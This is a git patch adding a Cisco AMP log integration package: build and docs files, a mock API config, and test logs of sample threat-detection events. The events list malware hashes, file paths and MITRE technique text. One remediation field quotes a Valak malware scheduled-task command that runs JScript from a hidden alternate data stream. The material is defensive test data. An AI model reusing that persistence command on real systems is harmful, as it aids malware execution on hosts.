From 300d8eb0c771af4893e5da5797e4ffe95da35e2f Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Sun, 12 Sep 2021 19:46:52 +0000
Subject: [PATCH 1/9] #1624: Add Cisco AMP package

---
 packages/cisco_amp/_dev/build/build.yml       |    3 +
 packages/cisco_amp/_dev/build/docs/README.md  |   16 +
 .../_dev/deploy/docker/docker-compose.yml     |   14 +
 .../_dev/deploy/docker/files/config.yml       |   30 +
 packages/cisco_amp/changelog.yml              |    6 +
 .../_dev/test/pipeline/cisco_amp2.ndjson.log  |   42 +
 .../cisco_amp2.ndjson.log-expected.json       | 3840 ++++++++
 .../_dev/test/pipeline/cisco_amp3.ndjson.log  |   45 +
 .../cisco_amp3.ndjson.log-expected.json       | 3825 ++++++++
 .../_dev/test/pipeline/cisco_amp4.ndjson.log  |  100 +
 .../cisco_amp4.ndjson.log-expected.json       | 8107 +++++++++++++++++
 .../_dev/test/pipeline/cisco_amp5.ndjson.log  |   62 +
 .../cisco_amp5.ndjson.log-expected.json       | 5084 +++++++++++
 .../_dev/test/pipeline/cisco_amp6.ndjson.log  |   53 +
 .../cisco_amp6.ndjson.log-expected.json       | 4310 +++++++++
 .../_dev/test/pipeline/cisco_amp7.ndjson.log  |   49 +
 .../cisco_amp7.ndjson.log-expected.json       | 3968 ++++++++
 .../test/pipeline/test-cisco_amp1.ndjson.log  |   49 +
 .../test-cisco_amp1.ndjson.log-expected.json  | 4041 ++++++++
 .../_dev/test/pipeline/test-common-config.yml |    5 +
 .../_dev/test/system/test-default-config.yml  |   10 +
 .../log/agent/stream/httpjson.yml.hbs         |   71 +
 .../elasticsearch/ingest_pipeline/default.yml |  475 +
 .../data_stream/log/fields/agent.yml          |  198 +
 .../data_stream/log/fields/base-fields.yml    |   46 +
 .../cisco_amp/data_stream/log/fields/ecs.yml  |   84 +
 .../data_stream/log/fields/fields.yml         |  292 +
 .../cisco_amp/data_stream/log/manifest.yml    |   92 +
 .../data_stream/log/sample_event.json         |   75 +
 packages/cisco_amp/docs/README.md             |  236 +
 packages/cisco_amp/img/cisco.svg              |    1 +
 packages/cisco_amp/manifest.yml               |   28 +
 32 files changed, 35257 insertions(+)
 create mode 100644 packages/cisco_amp/_dev/build/build.yml
 create mode 100644 packages/cisco_amp/_dev/build/docs/README.md
 create mode 100644 packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
 create mode 100644 packages/cisco_amp/_dev/deploy/docker/files/config.yml
 create mode 100644 packages/cisco_amp/changelog.yml
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
 create mode 100644 packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
 create mode 100644 packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
 create mode 100644 packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/agent.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/base-fields.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/ecs.yml
 create mode 100644 packages/cisco_amp/data_stream/log/fields/fields.yml
 create mode 100644 packages/cisco_amp/data_stream/log/manifest.yml
 create mode 100644 packages/cisco_amp/data_stream/log/sample_event.json
 create mode 100644 packages/cisco_amp/docs/README.md
 create mode 100644 packages/cisco_amp/img/cisco.svg
 create mode 100644 packages/cisco_amp/manifest.yml

diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_amp/_dev/build/build.yml
new file mode 100644
index 00000000000..a138b554aa0
--- /dev/null
+++ b/packages/cisco_amp/_dev/build/build.yml
@@ -0,0 +1,3 @@
+dependencies:
+  ecs:
+    reference: git@1.11
diff --git a/packages/cisco_amp/_dev/build/docs/README.md b/packages/cisco_amp/_dev/build/docs/README.md
new file mode 100644
index 00000000000..2d934ee3a94
--- /dev/null
+++ b/packages/cisco_amp/_dev/build/docs/README.md
@@ -0,0 +1,16 @@
+# Cisco AMP Integration
+
+This integration is for Cisco AMP logs. It includes the following
+datasets for receiving logs over syslog or read from a file:
+
+- `log` dataset: supports Cisco AMP logs.
+
+## Logs
+
+### AMP
+
+The `log` dataset collects Cisco AMP logs.
+
+{{event "log"}}
+
+{{fields "log"}}
diff --git a/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml b/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
new file mode 100644
index 00000000000..a438beca546
--- /dev/null
+++ b/packages/cisco_amp/_dev/deploy/docker/docker-compose.yml
@@ -0,0 +1,14 @@
+version: '2.3'
+services:
+  amp:
+    image: docker.elastic.co/observability/stream:v0.5.0
+    ports:
+      - 8080
+    volumes:
+      - ./files:/files:ro
+    environment:
+      PORT: 8080
+    command:
+      - http-server
+      - --addr=:8080
+      - --config=/files/config.yml
diff --git a/packages/cisco_amp/_dev/deploy/docker/files/config.yml b/packages/cisco_amp/_dev/deploy/docker/files/config.yml
new file mode 100644
index 00000000000..12dfd297f2c
--- /dev/null
+++ b/packages/cisco_amp/_dev/deploy/docker/files/config.yml
@@ -0,0 +1,30 @@
+rules:
+  - path: /v1/events
+    methods: ["GET"]
+    request_headers:
+      authorization: Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg=
+    query_params:
+      offset: "{offset:.*}"
+      limit: "{limit:.*}"
+      start_date: "{start_date:.*}"
+    responses:
+      - status_code: 200
+        body: |-
+          {
+            "version": "v1.2.0",
+            "metadata": {
+              "links": {
+                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset=limit={{ .request.vars.offset }}",
+              },
+              "results": {
+                "total": 4,
+                "current_item_count": 1,
+                "index": 0,
+                "items_per_page": 1
+              }
+            },
+            "data": [
+              {"id":6180352115244794000,"timestamp":1582222838,"timestamp_nanoseconds":279000000,"date":"2020-02-20T18:20:38+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","group_guids":["6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"],"severity":"Medium","computer":{"connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","hostname":"Demo_Upatre","external_ip":"69.226.122.127","user":"A@TEMPLATE-W7X86","active":true,"network_addresses":[{"ip":"230.122.135.241","mac":"3f:1e:b2:28:25:24"}],"links":{"computer":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72","trajectory":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72/trajectory","group":"https://api.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}},
+              {"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}
+            ]
+          }
diff --git a/packages/cisco_amp/changelog.yml b/packages/cisco_amp/changelog.yml
new file mode 100644
index 00000000000..0b98c79f61c
--- /dev/null
+++ b/packages/cisco_amp/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.0.1"
+  changes:
+    - description: Initial migration from Filebeat Module
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
new file mode 100644
index 00000000000..ae6c21d78ff
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
@@ -0,0 +1,42 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
